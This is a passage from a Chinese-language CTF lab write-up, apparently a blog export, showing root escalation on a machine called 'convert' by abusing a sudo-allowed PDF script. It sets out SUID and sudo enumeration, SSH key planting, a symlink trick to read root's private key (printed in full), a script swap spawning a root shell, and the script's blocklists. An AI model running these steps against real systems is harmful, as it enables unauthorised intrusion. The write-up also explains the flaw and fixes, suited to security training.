format=&#039;%(asctime)s - %(levelname)s - %(message)s&#039;)\n\ndef is_path_allowed(output_path):\n    blocked_directories = [&quot;\/root&quot;, &quot;\/etc&quot;]\n    for directory in blocked_directories:\n        if output_path.startswith(directory):\n            return False\n    return True\n\ndef url_html_to_pdf(url, output_path):\n    block_schemes = [&quot;file&quot;, &quot;data&quot;]\n    block_hosts = [&quot;127.0.0.1&quot;, &quot;localhost&quot;]\n    blocked_directories = [&quot;\/root&quot;, &quot;\/etc&quot;]\n\n    try:\n        start_time = time()\n\n        scheme = urlparse(url).scheme\n        hostname = urlparse(url).hostname\n\n        if scheme in block_schemes:\n            error(f&quot;{scheme} scheme is Blocked&quot;)\n            print(f&quot;Error: {scheme} scheme is Blocked&quot;)\n            return\n\n        if hostname in block_hosts:\n            error(f&quot;{hostname} hostname is Blocked&quot;)\n            print(f&quot;Error: {hostname} hostname is Blocked&quot;)\n            return\n\n        if not 
is_path_allowed(output_path):\n            error(f&quot;Output path is not allowed in {blocked_directories} directories&quot;)\n            print(f&quot;Error: Output path is not allowed in {blocked_directories} directories&quot;)\n            return\n\n        html = HTML(url.strip())\n        html.write_pdf(output_path, stylesheets=[CSS(string=&#039;@page { size: A3; margin: 1cm }&#039;)])\n\n        end_time = time()\n        elapsed_time = end_time - start_time\n        info(f&quot;PDF generated successfully at {output_path} in {elapsed_time:.2f} seconds&quot;)\n        print(f&quot;PDF generated successfully at {output_path} in {elapsed_time:.2f} seconds&quot;)\n\n    except Exception as e:\n        exception(f&quot;Error: {e}&quot;)\n        print(f&quot;Error: {e}&quot;)\n\nif __name__ == &quot;__main__&quot;:\n    parser = ArgumentParser(description=&quot;Convert HTML content from a URL to a PDF file.&quot;)\n    parser.add_argument(&quot;-U&quot;, &quot;--url&quot;, help=&quot;URL of the HTML content to convert&quot;, required=True)\n    parser.add_argument(&quot;-O&quot;, &quot;--out&quot;, help=&quot;Output file path for the generated PDF&quot;, default=&quot;\/home\/eva\/output.pdf&quot;)\n\n    args = parser.parse_args()\n    url_html_to_pdf(args.url, args.out)\n(remote) eva@convert:\/home\/eva$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/newgrp\n(remote) eva@convert:\/home\/eva$ find \/ -writable -type f 2&gt;\/dev\/null\n.......\n.......\n(remote) eva@convert:\/home\/eva$ sudo -l \nMatching Defaults entries for eva on convert:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser eva may run the following commands on 
convert:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/python3 \/home\/eva\/pdfgen.py *<\/code><\/pre>\n<h3>\u751f\u6210\u5bc6\u94a5ssh\u767b\u5f55<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# ssh-keygen -t rsa         \nGenerating public\/private rsa key pair.\nEnter file in which to save the key (\/root\/.ssh\/id_rsa): \/home\/kali\/temp\/convert\/eva\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/convert\/eva\nYour public key has been saved in \/home\/kali\/temp\/convert\/eva.pub\nThe key fingerprint is:\nSHA256:Nu49c+gtdrdKDNZ7Ura2kMhkuZdodSrRn9\/ifE2XIjQ root@kali\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|                 |\n|                 |\n|                 |\n|           E     |\n|        S O = + .|\n|       o * X @ +o|\n|        . B.% B.o|\n|       . o*=o*oo+|\n|        .oo*o+=+o|\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# ls -la\ntotal 52\ndrwxr-xr-x  2 kali kali  4096 Apr 15 07:16 .\ndrwxr-xr-x 43 kali kali  4096 Apr 15 03:20 ..\n-rwxr-xr-x  1 kali kali 10552 Apr 15 06:02 51270.py\n-rwxr-xr-x  1 kali kali  7844 Apr 15 06:02 51293.py\n-rw-------  1 root root  2590 Apr 15 07:16 eva\n-rw-r--r--  1 root root   563 Apr 15 07:16 eva.pub\n-rw-r--r--  1 kali kali   137 Apr 15 06:29 evil.css\n-rw-r--r--  1 kali kali  2051 Apr 15 06:13 evil.php\n-rw-r--r--  1 kali kali    65 Apr 15 06:25 exp.html\n-rw-r--r--  1 kali kali  3911 Apr 15 03:25 revershell.php\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# python3 -m http.server 8899\nServing HTTP on 0.0.0.0 port 8899 (http:\/\/0.0.0.0:8899\/) ...\n192.168.0.111 - - [15\/Apr\/2024 07:16:44] &quot;GET \/eva.pub HTTP\/1.1&quot; 200 -\n^C\nKeyboard interrupt received, 
exiting.\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# ssh eva@192.168.0.111 -i eva\nThe authenticity of host &#039;192.168.0.111 (192.168.0.111)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:UcMTODcLY+1hSC+QX0GB7UwPKAyADkaMiEptJMVYv6M.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added &#039;192.168.0.111&#039; (ED25519) to the list of known hosts.\neva@192.168.0.111&#039;s password: \n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# ssh eva@192.168.0.111 -i eva\nLinux convert 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\neva@convert:~$ <\/code><\/pre>\n<p>\u53e6\u4e00\u8fb9\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) eva@convert:\/home\/eva$ mkdir .ssh                                       \n(remote) eva@convert:\/home\/eva$ cd .ssh\n(remote) eva@convert:\/home\/eva\/.ssh$ wget http:\/\/192.168.0.143:8899\/eva.pub\n--2024-04-15 16:46:44--  http:\/\/192.168.0.143:8899\/eva.pub\nConnecting to 192.168.0.143:8899... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 563 [application\/vnd.exstream-package]\nSaving to: &#039;eva.pub&#039;\n\neva.pub        100%[=========================================================================&gt;]     563  --.-KB\/s    in 0s\n\n2024-04-15 16:46:44 (120 MB\/s) - &#039;eva.pub&#039; saved [563\/563]\n\n(remote) eva@convert:\/home\/eva\/.ssh$ ls\neva.pub\n(remote) eva@convert:\/home\/eva\/.ssh$ mv eva.pub authorized_keys<\/code><\/pre>\n<h3>\u5c1d\u8bd5\u811a\u672c\u5229\u7528<\/h3>\n<p>\u7136\u540e\u5c31\u662f\u5c1d\u8bd5\u5229\u7528\u524d\u9762\u4e00\u5f00\u59cb\u627e\u5230\u7684\u90a3\u4e2a\u8bfb\u53d6\u6587\u4ef6\u3002\u3002\u3002\u3002<\/p>\n<p>补充说明：从上面的 <code>pdfgen.py<\/code> 源码可以看到，脚本只对 URL 的 scheme（file、data）和主机名（127.0.0.1、localhost）做黑名单检查，而 <code>\/root<\/code>、<code>\/etc<\/code> 的目录限制只作用于输出路径，并不检查输入。<code>-U<\/code> 传入不带 scheme 的相对路径时，这些检查都不会命中，输入会被当作本地文件打开，并跟随符号链接；再加上 sudo 规则以 root 身份运行脚本且参数是通配符 <code>*<\/code>，所以能读到只有 root 才能访问的文件。修复思路：不要以 root 运行转换脚本；对输入先做 realpath 解析，并改用白名单（只允许 http\/https）；sudo 规则中固定参数，不使用通配符。<\/p>\n<pre><code class=\"language-bash\">eva@convert:~$ ls -la\ntotal 68\ndrwx------ 3 eva  eva   4096 Apr 15 17:15 .\ndrwxr-xr-x 3 root root  4096 Feb 22 22:17 ..\nlrwxrwxrwx 1 root root     9 Feb 23 17:01 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 eva  eva    220 Feb 22 22:17 .bash_logout\n-rw-r--r-- 1 eva  eva   3526 Feb 22 22:17 .bashrc\nlrwxrwxrwx 1 eva  eva     17 Apr 15 16:57 flag -&gt; \/root\/.ssh\/id_rsa\n-rw-r--r-- 1 eva  eva   1026 Apr 15 17:05 index.html\n-rw-r--r-- 1 root root 24883 Apr 15 17:44 pdf_gen.log\n-rw-r--r-- 1 root root  2736 Feb 23 21:36 pdfgen.py\n-rw-r--r-- 1 eva  eva    807 Feb 22 22:17 .profile\ndrwxr-xr-x 2 eva  eva   4096 Apr 15 16:47 .ssh\n-rw-r----- 1 eva  eva     33 Feb 23 17:16 user.txt\n-rw------- 1 eva  eva    737 Apr 15 17:15 .viminfo\neva@convert:~$ ln -s \/root\/.ssh\/id_rsa root\neva@convert:~$ sudo -l\nMatching Defaults entries for eva on convert:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser eva may run the following commands on convert:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/python3 \/home\/eva\/pdfgen.py *\neva@convert:~$ sudo \/usr\/bin\/python3 \/home\/eva\/pdfgen.py -U root -O \/tmp\/flag1\nPDF generated successfully at \/tmp\/flag1 in 0.10 seconds\neva@convert:~$ cd \/tmp\neva@convert:\/tmp$ 
python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.143 - - [15\/Apr\/2024 17:54:21] &quot;GET \/flag1 HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<p>\u7136\u540e\u672c\u673a\u5c1d\u8bd5\u8bfb\u53d6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051010.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051010.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415203059996\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6062\u590d\u4e00\u4e0b\u683c\u5f0f\uff1a<\/p>\n<pre><code class=\"language-text\">-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAwuT74ZxkltpDIeLfVydo0SgS+nqREGX8xfU1j8\/Et0D13dLbHsPS \naAVgEoDgU8\/CY5P17Lto0GouPRsjCSEEF7i8E6+0k5HOa2VCnu4wlIhDWo6xVDjhsrQuBn \nLUzTnU5rwUzVGH4EvZpwucdzPP8Z\/bmecJ17NETjhKfhEV9u07kiiBwZXjSYeYUUY\/qCbE RJg4nKRwoR187fF2jfo7gRqCFw9LXWCUHjnQNvPqsbAAzbiG0c7Y7VjCga\/kuf12WL92G7 lFTK7BvLXlbUUVDBcbd8wiPkXTUXQsoJLWfU7uamN2vx17DWbH42PQ6Ldoo9IG9Y5Pogh1\nfkJNjNLAuq3ezhqVWKuVGowRT1cQ0azjkE3y4YKoMce3ddLs+jQXgl+hncdk5WkVW\/RS0p\n27wx0MOPuBEiv3a5NHZew0OL8WOk+MMy4LE\/coK7zumFdYUbzP2qohPzyMc\/Rkpp\/Pui4i\nduAXaVuR5lbII+WZugD2OzbjPuRDNxu0ss0yqNZnAAAFiFbLnC5Wy5wuAAAAB3NzaC1yc2 \nEAAAGBAMLk++GcZJbaQyHi31cnaNEoEvp6kRBl\/MX1NY\/PxLdA9d3S2x7D0mgFYBKA4FPP\nwmOT9ey7aNBqLj0bIwkhBBe4vBOvtJORzmtlQp7uMJSIQ1qOsVQ44bK0LgZy1M051Oa8FM 
\n1Rh+BL2acLnHczz\/Gf25nnCdezRE44Sn4RFfbtO5IogcGV40mHmFFGP6gmxESYOJykcKEd\nfO3xdo36O4EaghcPS11glB450Dbz6rGwAM24htHO2O1YwoGv5Ln9dli\/dhu5RUyuwby15W\n1FFQwXG3fMIj5F01F0LKCS1n1O7mpjdr8dew1mx+Nj0Oi3aKPSBvWOT6IIdX5CTYzSwLqt\n3s4alVirlRqMEU9XENGs45BN8uGCqDHHt3XS7Po0F4JfoZ3HZOVpFVv0UtKdu8MdDDj7gR \nIr92uTR2XsNDi\/FjpPjDMuCxP3KCu87phXWFG8z9qqIT88jHP0ZKafz7ouInbgF2lbkeZW\nyCPlmboA9js24z7kQzcbtLLNMqjWZwAAAAMBAAEAAAGAObSMAcKJJANPAj8G6uq\/xcIMUH \n6u6gCQhdpzN\/gIIkxJIBtZBrRrXaJNzly7TwWCZHKAS843nBH8S9p3lrHgYNexVFDfchwn\nVrQeNCmJV8k6zBrY1XucFAn2YLFqYbOAXqsMq7g6t4Yt1SCCfObp6HxxDJIUX3n0PQa8w7\nPyYXDfhQiaVsO3DuPnjRT0Lyj\/TuIVTQgBUysEfP1UIXiYWsMLBqHgKi842\/Q5OrQg5uia\nbE75GDEbGLeBq911Jz6s4c+j7xQUe+5twaQl15dv5wh7ZAh5v7LYOVxFVnVR3kX7KqOXmE\nfIqRif166x1e4QMTOUO0CqWwFbccMMmVG6fAez7D4jUQ\/iDtiHELD7OEhclm7iZrRp5oH3\nnGlP+l6wG2ssEpSFZI6u8FWYSJhrWcVdjURqxRWpzNnIi0oWfF2ud\/Y+1W5y\/x7qStdhYZ \nWEacCIfEQqiS2w4ZtPejTw73I\/n\/vUpW+7XueGkr\/FTWQvjyVok7ucVL4q+Ng6TVgdAAAA\nwQCgVwiOK2Rxo4KD6vyKURe0FszrpLkSicrAu6AdS3XOz4v16a0nN1leEif4lGSRIONLso\n2UEqnC3OZPKeSM+JXmm0tFYdfT1rb755BsZlySNTVh899DZJ8+OX1JC4C+vrppl\/Ue98fi \nY9sbg5f8xVGpQsOMsmnEhvU1\/o3kvI7JvLrx1wh\/OUeWrlq2VuNfCEENQxG9OKqYQKbq4c\nywcRn27InTITqaOLbtNHziefasFMzwpbxURVo+taCmJIjhSGYAAADBAO5cicgy\/Ug3XMHO \nxMyqu\/GrhkmA1fDrqMfGy+eHDe4\/PsVGHXYpCou8p4mTP9q54yK9M22vvndCuIPcGpyM6p \nL3f2UijZ1uJH3EZuhldUWPJ3aAAobKnPiv5gnxGl9Aa1JZRHImOeojB\/54aUlKB6RCL96d slqM0przBaM2HUKyqWbdK5jby1gQ8F2CuDtBNXRmPNwM\/hkZIalDHB70JkJs2FU06JPsTD\nUqN26ZJbffqBcGoqIA1LAJzPSoIfL4HQAAAMEA0VEEa4kH\/GgfDPcO2Mz2XloBGr6AJ3si \n0urQbGMYhO5hs0KxzcnOw5\/3\/W54oGK\/lQTKkzXBx8VNsfUhvKNt0Pr4KDzNtp6wbE1DjE\nxyqnjEVEgvikm+cR46awTdP93P+nH1RF8Xj4iTuHfEpZVTS8Kq3yBLpYkB\/gjZ1U4IyTr3 \nBoG62j\/8BVupXa8NNYd2Z5EOCI8n0I9mSgHbeljNePQCJ7EZJCa1K2naUFsaZNvTb+waGe\nT7JtrQ2LFUUOlTAAAADHJvb3RAY29udmVydAECAwQFBg== \n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/convert]\n\u2514\u2500$ vim 
root\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/convert]\n\u2514\u2500$ chmod 600 root\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/convert]\n\u2514\u2500$ ssh root@192.168.0.111 -i root\nLinux convert 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Thu Jan  1 05:30:10 1970\nroot@convert:~# pwd\n\/root\nroot@convert:~# ls -la\ntotal 24\ndrwx------  3 root root 4096 Feb 24 10:08 .\ndrwxr-xr-x 18 root root 4096 Feb 22 22:14 ..\nlrwxrwxrwx  1 root root    9 Feb 23 17:00 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root  571 Apr 11  2021 .bashrc\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   33 Feb 23 17:15 root.txt\ndrwx------  2 root root 4096 Feb 23 21:38 .ssh\nroot@convert:~# cat root.txt \n1cc872dad04d177e6732abbedf1e525b\nroot@convert:~# cd .ssh\/\nroot@convert:~\/.ssh# ls -la\ntotal 16\ndrwx------ 2 root root 4096 Feb 23 21:38 .\ndrwx------ 3 root root 4096 Feb 24 10:08 ..\n-rw-r--r-- 1 root root  566 Feb 23 17:01 authorized_keys\n-rw------- 1 root root 2602 Feb 23 21:38 id_rsa<\/code><\/pre>\n<p>28\u5e08\u5085\u63d0\u793a\uff0c\u5176\u5b9e\u53ef\u4ee5\u4e0d\u7528\u6574\u7406\u7684\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051011.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051011.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415204959328\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8bd5\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051012.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051012.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415205108533\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u725b\u903c\u3002\u3002\u3002<\/p>\n<h3>\u7fa4\u4e3b\u5e08\u5085\u7684\u89e3\u6cd5<\/h3>\n<p>\u7fa4\u4e3b\u5e08\u5085\u5728\u64cd\u4f5c\u7684\u65f6\u5019\uff0c\u9009\u62e9\u7684\u662f\u738b\u70b8\u89e3\u6cd5\uff0c\u56e0\u4e3a\u6587\u4ef6\u6240\u5728\u7684\u76ee\u5f55\u53ef\u5199\uff08\u6587\u4ef6\u672c\u8eab\u5c5e\u4e8eroot\uff0c\u4f46\u53ef\u4ee5\u5220\u9664\u540e\u91cd\u5efa\uff09\uff0c\u7fa4\u4e3b\u5e08\u5085\u76f4\u63a5\u9009\u62e9\u4e86\u66ff\u6362<code>pdfgen.py<\/code>\u6587\u4ef6\uff0c\u83b7\u53d6shell\uff01\uff01\uff01\uff01<\/p>\n<pre><code class=\"language-bash\">cd \/tmp\nvim pdfgen.py\nimport os\nos.system(&quot;\/bin\/bash&quot;)\ncd \/home\/eva\nrm pdfgen.py \ncp \/tmp\/pdfgen.py \/home\/eva\/pdfgen.py<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152108158.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152108158.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415210748406\" \/><\/div><\/p>\n<h3>\u5176\u4ed6\u89e3\u6cd5<\/h3>\n<p>\u672c\u9898\u5b9e\u9645\u4e0a\u6ca1\u6709\u8fc7\u6ee4\u6389root\u4ee5\u53caetc\u8def\u5f84\uff0c\u4e5f\u5c31\u662f\u8bf4\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u8bfb\u53d6\u5176\u4e2d\u7684\u6587\u4ef6\uff0c\u800c\u4e0d\u5fc5\u62c5\u5fc3\u88ab\u62e6\u4f4f\uff01<\/p>\n<pre><code class=\"language-bash\">sudo \/usr\/bin\/python3 \/home\/eva\/pdfgen.py -U \/root\/root.txt -O \/tmp\/flag.pdf<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>convert \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.111 &#8212; -A Open  
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-569","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/569","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=569"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/569\/revisions"}],"predecessor-version":[{"id":710,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/569\/revisions\/710"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=569"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=569"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=569"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}